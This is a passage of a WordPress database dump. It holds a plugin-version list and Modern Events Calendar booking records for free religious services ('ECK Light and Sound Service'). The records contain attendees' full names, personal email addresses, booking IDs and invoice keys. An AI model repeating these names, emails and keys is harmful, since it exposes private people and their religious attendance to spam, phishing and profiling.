mec-fluent-layouts.php\";s:5:\"1.5.0\";s:41:\"mec-liquid-layouts/mec-liquid-layouts.php\";s:5:\"1.2.0\";s:30:\"modern-events-calendar/mec.php\";s:5:\"7.2.2\";s:35:\"modula-best-grid-gallery/Modula.php\";s:5:\"2.7.8\";s:27:\"ninja-forms/ninja-forms.php\";s:6:\"3.6.34\";s:55:\"styler-for-ninja-forms-lite/ninja-forms-styler-lite.php\";s:5:\"3.3.4\";s:39:\"content-protector/content-protector.php\";s:5:\"4.2.5\";s:39:\"plugin-notes-plus/plugin-notes-plus.php\";s:5:\"1.2.6\";s:47:\"post-and-page-builder/post-and-page-builder.php\";s:6:\"1.25.1\";s:63:\"post-and-page-builder-premium/post-and-page-builder-premium.php\";s:5:\"1.1.2\";s:30:\"protect-the-children/index.php\";s:5:\"1.4.0\";s:27:\"redis-cache/redis-cache.php\";s:5:\"2.4.4\";s:45:\"remember-me-controls/remember-me-controls.php\";s:5:\"2.0.1\";s:66:\"remove-dashboard-access-for-non-admins/remove-dashboard-access.php\";s:5:\"1.1.5\";s:58:\"responsive-accordion-and-collapse/responsive-accordion.php\";s:5:\"2.4.5\";s:42:\"scripts-to-footerphp/scripts-to-footer.php\";s:5:\"0.7.1\";s:39:\"simple-custom-css/simple-custom-css.php\";s:5:\"4.0.6\";s:24:\"simple-history/index.php\";s:5:\"4.7.2\";s:19:\"404page/404page.php\";s:6:\"11.4.4\";s:35:\"boldgrid-backup/boldgrid-backup.php\";s:6:\"1.15.7\";s:51:\"boldgrid-backup-premium/boldgrid-backup-premium.php\";s:5:\"1.5.9\";s:27:\"updraftplus/updraftplus.php\";s:7:\"1.23.11\";s:23:\"wordfence/wordfence.php\";s:6:\"7.10.7\";s:27:\"wp-optimize/wp-optimize.php\";s:6:\"3.2.21\";s:35:\"insert-headers-and-footers/ihaf.php\";s:7:\"2.1.4.1\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:5:\"1.2.1\";s:25:\"wp-staging/wp-staging.php\";s:5:\"3.1.1\";s:36:\"google-sitemap-generator/sitemap.php\";s:6:\"4.1.13\";s:33:\"duplicate-post/duplicate-post.php\";s:3:\"4.5\";}}','no'),(7521132,'OMK70997','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"katyahuu@gmail.com\";s:4:\"name\";s:11:\"Kathy Young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"268940\";s:19:\"translated_event_id\";s:6:\"268940\";s:4:\"date\";s:21:\"1693737000:1693740600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1693737000:1693740600\";}s:10:\"booking_id\";i:268969;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"ff0b33aee2a4deb9f5ffac347542a098\";}','no'),(7599624,'mec_cart_192606544','a:0:{}','no'),(7599691,'RYC38070','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269260\";s:19:\"translated_event_id\";s:6:\"269260\";s:4:\"date\";s:21:\"1699785000:1699831800\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1699785000:1699831800\";}s:10:\"booking_id\";i:269378;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"eb84608efeb71725248c031e3b29c69d\";}','no'),(7599768,'JFX18094','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269260\";s:19:\"translated_event_id\";s:6:\"269260\";s:4:\"date\";s:21:\"1699785000:1699831800\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1699785000:1699831800\";}s:10:\"booking_id\";i:269379;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"b9fbc314bf2eccd4361629787d57fc35\";}','no'),(7599693,'mec_cart_814116797','a:0:{}','no'),(7540968,'wpstg_version','3.1.2','yes'),(7555317,'mec_cart_743458557','a:0:{}','no'),(7510737,'folders_term_meta_migrated','yes','yes'),(7599781,'RPB39035','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"kbatty11@yahoo.com\";s:4:\"name\";s:12:\"Kim Stoltman\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269260\";s:19:\"translated_event_id\";s:6:\"269260\";s:4:\"date\";s:21:\"1699785000:1699831800\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1699785000:1699831800\";}s:10:\"booking_id\";i:269380;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"0ae333320068a72be2007c53350f6ec3\";}','no'),(7579327,'sm_beta_banner_discarded_on','2023/10/25','yes'),(7510856,'mec_cart_289753930','a:0:{}','no'),(7557711,'PHR94097','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269175;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"9ca902bdecdf1675989bcee2b77d3441\";}','no'),(7367414,'_transient_is_multi_author','0','yes'),(7395167,'GPM41789','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268470;s:11:\"invoice_key\";s:32:\"11fc63bd155f0d327ca6b25a169c43df\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7395068,'UFH29900','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1684060200:1684063800\";s:8:\"event_id\";s:6:\"268417\";s:19:\"translated_event_id\";s:6:\"268417\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268469;s:11:\"invoice_key\";s:32:\"3bdc624ca0a1eda7a4e6f08b469c7055\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7438012,'GPM41789_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"Kery Colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438013,'EPX33602_cached','a:1:{i:0;a:24:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438014,'JXG14538_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438015,'OTP13966_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438016,'AUX15539_cached','a:1:{i:0;a:24:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1684060200:1684063800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1684060200;s:20:\"ticket_timestamp_end\";i:1684107000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7428105,'AYS54080','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268614;s:11:\"invoice_key\";s:32:\"0ddc3d50dd6b5236fa7254345ec7bbef\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7428234,'ZMK94087','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"allanborenstein@yahoo.com\";s:4:\"name\";s:7:\"Allan B\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268615;s:11:\"invoice_key\";s:32:\"eda8537aba68a8fefbc8fc2354b9e78e\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"allanborenstein@yahoo.com\";s:4:\"name\";s:7:\"Allan B\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7428501,'VTM37468','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"agstreet11@gmail.com\";s:4:\"name\";s:13:\"A Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268617;s:11:\"invoice_key\";s:32:\"5f7c68b51389b8943b0358343a0ed361\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"agstreet11@gmail.com\";s:4:\"name\";s:13:\"A Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7428504,'FDM78046','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"billybobvak@yahoo.com\";s:4:\"name\";s:16:\"Marc Maqssengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268618;s:11:\"invoice_key\";s:32:\"f91ab95d9e0ec61865436b59caa42bcb\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"billybobvak@yahoo.com\";s:4:\"name\";s:16:\"Marc Maqssengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7428507,'QGV17111','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"Marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1686479400:1686483000\";s:8:\"event_id\";s:6:\"268482\";s:19:\"translated_event_id\";s:6:\"268482\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:268619;s:11:\"invoice_key\";s:32:\"d66374a36436a646a8cc0d4b1d2d8d8d\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"Marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7540964,'wpstg_installDate','2023-09-21 05:30:04','yes'),(7540969,'wpstg_version_upgraded_from','3.1.1','yes'),(7540970,'wpstg_free_upgrade_date','2023-11-14 21:06','yes'),(7438003,'OUW18714_cached','a:1:{i:0;a:24:{s:5:\"email\";s:19:\"Molliesch@gmail.com\";s:4:\"name\";s:6:\"Mollie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1686479400:1686483000\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1686479400;s:20:\"ticket_timestamp_end\";i:1686526200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438019,'SJA73724_cached','a:1:{i:0;a:24:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:13:\"Agnes R Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:32:\"Experience HU, The Sound of Soul\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1683455400:1683502200\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1683455400;s:20:\"ticket_timestamp_end\";i:1683502200;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7438020,'ZQS12163_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:6:\"row_id\";i:1;s:12:\"attendee_key\";i:0;s:9:\"ticket_id\";s:0:\"\";s:11:\"ticket_name\";s:27:\"ECK Light and Sound Service\";s:12:\"ticket_price\";s:1:\"0\";s:14:\"tickets_amount\";i:0;s:30:\"tickets_amount_with_variations\";i:0;s:46:\"partial_payment_tickets_amount_with_variations\";i:0;s:12:\"ticket_limit\";s:0:\"\";s:17:\"variations_amount\";i:0;s:18:\"variations_details\";a:0:{}s:4:\"date\";s:21:\"1681036200:1681039800\";s:10:\"product_id\";i:0;s:22:\"ticket_timestamp_start\";i:1681036200;s:20:\"ticket_timestamp_end\";i:1681083000;s:22:\"fees_per_ticket_amount\";i:0;s:11:\"fees_amount\";i:0;s:12:\"fees_details\";a:0:{}s:16:\"discounts_amount\";i:0;s:17:\"discounts_details\";a:0:{}}}','no'),(7553276,'UXS79443','a:24:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:5:\"Test2\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:13:\"first_for_all\";b:0;s:8:\"event_id\";s:6:\"269109\";s:19:\"translated_event_id\";s:6:\"269109\";s:4:\"date\";s:21:\"1696761000:1696764600\";s:9:\"all_dates\";a:0:{}s:10:\"timestamps\";a:1:{i:0;s:21:\"1696761000:1696764600\";}s:10:\"booking_id\";i:269164;s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:7:\"payable\";i:0;s:6:\"coupon\";N;s:6:\"fields\";a:0:{}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:8:\"order_id\";s:0:\"\";s:5:\"WCTax\";s:0:\"\";s:10:\"wc_coupons\";a:0:{}s:12:\"wc_discounts\";a:0:{}s:18:\"is_partial_payment\";i:0;s:24:\"partial_payment_settings\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"payable\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:8:\"Subtotal\";s:4:\"type\";s:7:\"tickets\";}}}s:11:\"invoice_key\";s:32:\"323667faa44b5477668ac3000f4ea388\";}','no'),(7510826,'mec_cart_456581061','a:0:{}','no'),(7438001,'SUT85426_cached','a:1:{i:0;a:24:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van 